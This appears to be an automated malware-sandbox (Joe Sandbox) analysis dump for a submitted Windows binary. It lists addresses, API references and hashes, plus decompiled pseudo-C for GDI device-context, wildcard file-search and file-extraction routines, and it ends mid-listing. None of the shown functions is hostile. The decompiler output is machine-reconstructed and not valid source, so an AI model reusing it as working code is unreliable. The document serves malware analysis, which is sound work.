                                                        0x00a1a2ed
                                                        0x00a1a29b
                                                        0x00a1a29f
                                                        0x00a1a2a6
                                                        0x00a1a2b8
                                                        0x00a1a2c3
                                                        0x00a1a30e
                                                        0x00a1a31d
                                                        0x00a1a325
                                                        0x00a1a32d
                                                        0x00a1a336
                                                        0x00a1a33a
                                                        0x00a1a33f
                                                        0x00a1a342
                                                        0x00a1a351
                                                        0x00a1a357
                                                        0x00a1a35f
                                                        0x00a1a365
                                                        0x00a1a373
                                                        0x00a1a379
                                                        0x00a1a38a
                                                        0x00a1a390
                                                        0x00a1a392
                                                        0x00a1a3aa
                                                        0x00a1a3b0
                                                        0x00a1a3b3
                                                        0x00a1a3be
                                                        0x00a1a3c2
                                                        0x00a1a3c9
                                                        0x00a1a3d0
                                                        0x00a1a3d4
                                                        0x00a1a3e8
                                                        0x00a1a3f3
                                                        0x00a1a403
                                                        0x00a1a3f5
                                                        0x00a1a3f9
                                                        0x00a1a3f9
                                                        0x00a1a409
                                                        0x00a1a415
                                                        0x00a1a41b
                                                        0x00a1a41b
                                                        0x00a1a41d
                                                        0x00a1a429
                                                        0x00a1a42f
                                                        0x00a1a431
                                                        0x00a1a43d
                                                        0x00a1a443
                                                        0x00a1a445
                                                        0x00a1a451
                                                        0x00a1a457
                                                        0x00a1a459
                                                        0x00a1a45f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1a45f
                                                        0x00a1a2c5
                                                        0x00a1a2d1
                                                        0x00a1a2d7
                                                        0x00000000
                                                        0x00a1a2d7
                                                        0x00000000
                                                        0x00a1a225
                                                        0x00a1a225
                                                        0x00a1a249
                                                        0x00a1a24e
                                                        0x00a1a46d
                                                        0x00000000
                                                        0x00a1a46f
                                                        0x00a1a21d
                                                        0x00a1a1c9
                                                        0x00a1a1cd
                                                        0x00a1a1d1
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 00A1A051: GetDC.USER32(00000000), ref: 00A1A055
                                                          • Part of subcall function 00A1A051: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A1A060
                                                          • Part of subcall function 00A1A051: ReleaseDC.USER32(00000000,00000000), ref: 00A1A06B
                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00A1A1ED
                                                          • Part of subcall function 00A1A476: GetDC.USER32(00000000), ref: 00A1A47F
                                                          • Part of subcall function 00A1A476: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,00A1A1DA,?,?,?), ref: 00A1A4AE
                                                          • Part of subcall function 00A1A476: ReleaseDC.USER32(00000000,?), ref: 00A1A546
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ObjectRelease$CapsDevice
                                                        • String ID: (
                                                        • API String ID: 1061551593-3887548279
                                                        • Opcode ID: 2d8dd6a52272c564f35a303f52343788ee0240e0746452873cabb9e9898720ce
                                                        • Instruction ID: c2e69010e240497b9ec720a2b88ffc6a2a7456fc00f4ae078cfdda7fc22bd701
                                                        • Opcode Fuzzy Hash: 2d8dd6a52272c564f35a303f52343788ee0240e0746452873cabb9e9898720ce
                                                        • Instruction Fuzzy Hash: F4911171208354AFC650DFA9CC48AABBBF8FF99700F00481DF58AD7260DB75A945CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2AC28 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E00A2AC28(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E00A27C27(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00A2EB71(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00A28B69();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E00A288C9(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E00A2EB71(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E00A2AFF7(_a12, _t193, __eflags, _t213);
													E00A287FE(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E00A2EB71(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00A28B69();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0xa3e668; // 0xcba178b4
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E00A2EBC0(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E00A1F5F0(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E00A25D80(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00A2AC10);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E00A1EEFA(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E00A287FE(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E00A2EB80( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E00A2AFD2( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E00A28C7A();
					_t219 = 0x16;
					 *_t148 = _t219;
					E00A28B59();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}





















































































                                                        0x00a2ac2d
                                                        0x00a2ac30
                                                        0x00a2ac36
                                                        0x00a2ac4e
                                                        0x00a2ac51
                                                        0x00a2ac55
                                                        0x00a2ac57
                                                        0x00a2ac59
                                                        0x00a2ac5b
                                                        0x00a2ac5e
                                                        0x00a2ac61
                                                        0x00a2ac64
                                                        0x00a2ac66
                                                        0x00a2acbe
                                                        0x00a2acbe
                                                        0x00a2acc4
                                                        0x00a2acc6
                                                        0x00a2acd1
                                                        0x00a2acd5
                                                        0x00a2acd7
                                                        0x00a2acda
                                                        0x00a2acde
                                                        0x00a2acde
                                                        0x00a2ace0
                                                        0x00a2ace2
                                                        0x00a2ace4
                                                        0x00a2ace6
                                                        0x00a2ace6
                                                        0x00a2ace8
                                                        0x00a2aceb
                                                        0x00a2acee
                                                        0x00a2acee
                                                        0x00a2acf0
                                                        0x00a2acf1
                                                        0x00a2acf1
                                                        0x00a2acfc
                                                        0x00a2acfe
                                                        0x00a2ad01
                                                        0x00a2ad02
                                                        0x00a2ad05
                                                        0x00a2ad05
                                                        0x00a2ad09
                                                        0x00a2ad0c
                                                        0x00a2ad0f
                                                        0x00a2ad0f
                                                        0x00a2ad1d
                                                        0x00a2ad1f
                                                        0x00a2ad22
                                                        0x00a2ad24
                                                        0x00a2ad2e
                                                        0x00a2ad31
                                                        0x00a2ad34
                                                        0x00a2ad36
                                                        0x00a2ad39
                                                        0x00a2ad3b
                                                        0x00a2ad8b
                                                        0x00a2ad8e
                                                        0x00a2ad8e
                                                        0x00a2ad90
                                                        0x00000000
                                                        0x00a2ad3d
                                                        0x00a2ad3f
                                                        0x00a2ad3f
                                                        0x00a2ad41
                                                        0x00a2ad44
                                                        0x00a2ad44
                                                        0x00a2ad49
                                                        0x00a2ad4c
                                                        0x00a2ad4c
                                                        0x00a2ad4e
                                                        0x00a2ad4f
                                                        0x00a2ad4f
                                                        0x00a2ad53
                                                        0x00a2ad56
                                                        0x00a2ad56
                                                        0x00a2ad59
                                                        0x00a2ad5c
                                                        0x00a2ad69
                                                        0x00a2ad6e
                                                        0x00a2ad71
                                                        0x00a2ad73
                                                        0x00a2adad
                                                        0x00a2adae
                                                        0x00a2adaf
                                                        0x00a2adb0
                                                        0x00a2adb1
                                                        0x00a2adb2
                                                        0x00a2adb7
                                                        0x00a2adbb
                                                        0x00a2adbd
                                                        0x00a2adbe
                                                        0x00a2adc1
                                                        0x00a2adc1
                                                        0x00a2adc4
                                                        0x00a2adc4
                                                        0x00a2adc6
                                                        0x00a2adc7
                                                        0x00a2adc7
                                                        0x00a2add0
                                                        0x00a2add1
                                                        0x00a2add4
                                                        0x00a2add7
                                                        0x00a2adda
                                                        0x00a2addc
                                                        0x00a2ade3
                                                        0x00a2ade5
                                                        0x00a2ade8
                                                        0x00a2adf2
                                                        0x00a2adf5
                                                        0x00a2adf6
                                                        0x00a2adf8
                                                        0x00a2ae0c
                                                        0x00a2ae0c
                                                        0x00a2ae0f
                                                        0x00a2ae19
                                                        0x00a2ae1e
                                                        0x00a2ae21
                                                        0x00a2ae23
                                                        0x00000000
                                                        0x00a2ae25
                                                        0x00a2ae29
                                                        0x00a2ae32
                                                        0x00a2ae38
                                                        0x00000000
                                                        0x00a2ae3b
                                                        0x00a2adfa
                                                        0x00a2adfa
                                                        0x00a2ae00
                                                        0x00a2ae05
                                                        0x00a2ae08
                                                        0x00a2ae0a
                                                        0x00a2ae41
                                                        0x00a2ae43
                                                        0x00a2ae44
                                                        0x00a2ae45
                                                        0x00a2ae46
                                                        0x00a2ae47
                                                        0x00a2ae48
                                                        0x00a2ae4d
                                                        0x00a2ae50
                                                        0x00a2ae51
                                                        0x00a2ae53
                                                        0x00a2ae59
                                                        0x00a2ae60
                                                        0x00a2ae63
                                                        0x00a2ae66
                                                        0x00a2ae67
                                                        0x00a2ae6a
                                                        0x00a2ae6b
                                                        0x00a2ae6e
                                                        0x00a2ae6f
                                                        0x00a2ae90
                                                        0x00a2ae90
                                                        0x00a2ae92
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2ae77
                                                        0x00a2ae79
                                                        0x00a2ae7b
                                                        0x00a2ae7d
                                                        0x00a2ae7f
                                                        0x00a2ae81
                                                        0x00a2ae83
                                                        0x00a2ae8e
                                                        0x00000000
                                                        0x00a2ae8e
                                                        0x00a2ae83
                                                        0x00a2ae7f
                                                        0x00000000
                                                        0x00a2ae7b
                                                        0x00a2ae94
                                                        0x00a2ae96
                                                        0x00a2ae99
                                                        0x00a2aeb2
                                                        0x00a2aeb2
                                                        0x00a2aeb4
                                                        0x00a2aeb7
                                                        0x00a2aec7
                                                        0x00a2aec9
                                                        0x00a2aec9
                                                        0x00a2aeb9
                                                        0x00a2aeb9
                                                        0x00a2aebc
                                                        0x00000000
                                                        0x00a2aebe
                                                        0x00a2aebe
                                                        0x00a2aec1
                                                        0x00000000
                                                        0x00a2aec3
                                                        0x00a2aec3
                                                        0x00a2aec3
                                                        0x00a2aec1
                                                        0x00a2aebc
                                                        0x00a2aed7
                                                        0x00a2aedb
                                                        0x00a2aee9
                                                        0x00a2aeee
                                                        0x00a2af03
                                                        0x00a2af05
                                                        0x00a2af0b
                                                        0x00a2af0e
                                                        0x00a2af40
                                                        0x00a2af40
                                                        0x00a2af45
                                                        0x00a2af4b
                                                        0x00a2af4b
                                                        0x00a2af52
                                                        0x00a2af6c
                                                        0x00a2af6c
                                                        0x00a2af6d
                                                        0x00a2af73
                                                        0x00a2af79
                                                        0x00a2af7a
                                                        0x00a2af7b
                                                        0x00a2af80
                                                        0x00a2af83
                                                        0x00a2af85
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2af54
                                                        0x00a2af54
                                                        0x00a2af5a
                                                        0x00a2af5c
                                                        0x00000000
                                                        0x00a2af5e
                                                        0x00a2af5e
                                                        0x00a2af61
                                                        0x00000000
                                                        0x00a2af63
                                                        0x00a2af63
                                                        0x00a2af6a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2af6a
                                                        0x00a2af61
                                                        0x00a2af5c
                                                        0x00000000
                                                        0x00a2af87
                                                        0x00a2af8f
                                                        0x00a2af95
                                                        0x00a2af97
                                                        0x00a2af97
                                                        0x00a2af9f
                                                        0x00a2afa4
                                                        0x00a2afac
                                                        0x00a2afaf
                                                        0x00a2afb1
                                                        0x00a2afc5
                                                        0x00a2afca
                                                        0x00a2af10
                                                        0x00a2af10
                                                        0x00a2af11
                                                        0x00a2af12
                                                        0x00a2af13
                                                        0x00a2af14
                                                        0x00a2af1c
                                                        0x00a2af1c
                                                        0x00a2af1c
                                                        0x00a2af1e
                                                        0x00a2af21
                                                        0x00a2af24
                                                        0x00a2af24
                                                        0x00a2ae9b
                                                        0x00a2ae9e
                                                        0x00a2aea0
                                                        0x00000000
                                                        0x00a2aea2
                                                        0x00a2aea2
                                                        0x00a2aea5
                                                        0x00a2aea6
                                                        0x00a2aea7
                                                        0x00a2aea8
                                                        0x00a2aead
                                                        0x00a2aea0
                                                        0x00a2af2c
                                                        0x00a2af31
                                                        0x00a2af3c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2ae0a
                                                        0x00a2adde
                                                        0x00a2ade0
                                                        0x00a2ae3c
                                                        0x00a2ae40
                                                        0x00a2ae40
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2ad75
                                                        0x00a2ad78
                                                        0x00a2ad7b
                                                        0x00a2ad7e
                                                        0x00a2ad81
                                                        0x00a2ad84
                                                        0x00a2ad87
                                                        0x00a2ad87
                                                        0x00000000
                                                        0x00a2ad44
                                                        0x00a2ad26
                                                        0x00a2ad26
                                                        0x00a2ad92
                                                        0x00a2ad94
                                                        0x00000000
                                                        0x00a2ad99
                                                        0x00a2ac68
                                                        0x00a2ac68
                                                        0x00a2ac6b
                                                        0x00a2ac74
                                                        0x00a2ac77
                                                        0x00a2ac7e
                                                        0x00a2ac80
                                                        0x00a2ac99
                                                        0x00a2ac9a
                                                        0x00a2ac9b
                                                        0x00a2ac9d
                                                        0x00a2aca2
                                                        0x00a2ac82
                                                        0x00a2ac82
                                                        0x00a2ac85
                                                        0x00a2ac86
                                                        0x00a2ac88
                                                        0x00a2ac8a
                                                        0x00a2ac8c
                                                        0x00a2ac91
                                                        0x00a2ac91
                                                        0x00a2aca5
                                                        0x00a2aca7
                                                        0x00a2aca9
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2acaf
                                                        0x00a2acb2
                                                        0x00a2acb4
                                                        0x00a2acb6
                                                        0x00000000
                                                        0x00a2acb8
                                                        0x00a2acb8
                                                        0x00a2acbb
                                                        0x00000000
                                                        0x00a2acbb
                                                        0x00000000
                                                        0x00a2acb6
                                                        0x00a2ad9a
                                                        0x00a2ad9d
                                                        0x00a2ada2
                                                        0x00000000
                                                        0x00a2ada5
                                                        0x00a2ac38
                                                        0x00a2ac38
                                                        0x00a2ac3f
                                                        0x00a2ac40
                                                        0x00a2ac42
                                                        0x00a2ac47
                                                        0x00a2ada6
                                                        0x00a2adaa
                                                        0x00a2adaa
                                                        0x00000000

                                                        APIs
                                                        • _free.LIBCMT ref: 00A2AD94
                                                          • Part of subcall function 00A28B69: IsProcessorFeaturePresent.KERNEL32(00000017,00A28B58,0000002C,00A3BC40,00A2BD76,00000000,00000000,00A29338,?,?,00A28B65,00000000,00000000,00000000,00000000,00000000), ref: 00A28B6B
                                                          • Part of subcall function 00A28B69: GetCurrentProcess.KERNEL32(C0000417,00A3BC40,0000002C,00A28896,00000016,00A29338), ref: 00A28B8D
                                                          • Part of subcall function 00A28B69: TerminateProcess.KERNEL32(00000000), ref: 00A28B94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                        • String ID: *?$.
                                                        • API String ID: 2667617558-3972193922
                                                        • Opcode ID: b6f4886fb241bc6412e8874b3df55810ed09b0cad714297808d292c8a57c0ef0
                                                        • Instruction ID: b5629f3217182e8db4c0db9324928d3115a57168c052edd0bb243a6c4959789e
                                                        • Opcode Fuzzy Hash: b6f4886fb241bc6412e8874b3df55810ed09b0cad714297808d292c8a57c0ef0
                                                        • Instruction Fuzzy Hash: 4251AF72E0022AAFDF14DFACD981AADB7B5FF68310F248179E844E7341E6359E018B51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A077FA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E00A077FA(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E00A1E554(E00A320CA, _t108);
				E00A1E630();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E00A10131(_t108 - 0x1014, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E00A079FD(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x4084, 0x800);
					_t113 =  *((short*)(_t108 - 0x4084)) - 0x3a;
					if( *((short*)(_t108 - 0x4084)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E00A10109(__eflags, _t108 - 0x1014, _t108 - 0x4084, _t101);
							E00A07119(_t108 - 0x3084);
							_push(0);
							_t54 = E00A0A6B9(_t108 - 0x3084, _t99, __eflags, _t106, _t108 - 0x3084);
							_t85 =  *(_t108 - 0x207c);
							 *((char*)(_t108 - 0xd)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E00A0A637(_t106, _t85 & 0xfffffffe);
							}
							E00A097B6(_t108 - 0x203c);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E00A0A06F(_t108 - 0x203c, __eflags, _t108 - 0x1014, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x203c);
								_push(0);
								_t68 = E00A03AC2(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E00A09870(_t108 - 0x203c);
								}
							}
							E00A097B6(_t108 - 0x50ac);
							__eflags =  *((char*)(_t108 - 0xd));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 - 0xd)) != 0) {
								_t62 = E00A09B50(_t108 - 0x50ac, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x50a8), _t108 - 0x205c, _t108 - 0x2054, _t108 - 0x204c);
								}
							}
							E00A0A637(_t106,  *(_t108 - 0x207c));
							E00A097F0(_t108 - 0x50ac, _t106);
							_t90 = _t108 - 0x203c;
						} else {
							E00A097B6(_t108 - 0x60d4);
							_push(1);
							_push(_t108 - 0x60d4);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E00A03AC2(_t81, _t99);
							_t90 = _t108 - 0x60d4;
						}
						_t61 = E00A097F0(_t90, _t106);
					} else {
						E00A06D72(_t113, 0x53, _t81 + 0x24, _t106);
						_t61 = E00A06FBA(0xa40f50, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E00A10131(_t108 - 0x1014, 0xa33760, 0x802);
					E00A10109(_t112, _t108 - 0x1014, _t106, 0x802);
					goto L4;
				}
			}















                                                        0x00a077fa
                                                        0x00a077ff
                                                        0x00a07809
                                                        0x00a07810
                                                        0x00a07819
                                                        0x00a07848
                                                        0x00a07848
                                                        0x00a07856
                                                        0x00a0785b
                                                        0x00a0785b
                                                        0x00a0786b
                                                        0x00a07870
                                                        0x00a07878
                                                        0x00a07897
                                                        0x00a0789b
                                                        0x00a078d8
                                                        0x00a078e3
                                                        0x00a078f0
                                                        0x00a078f3
                                                        0x00a078f8
                                                        0x00a078fe
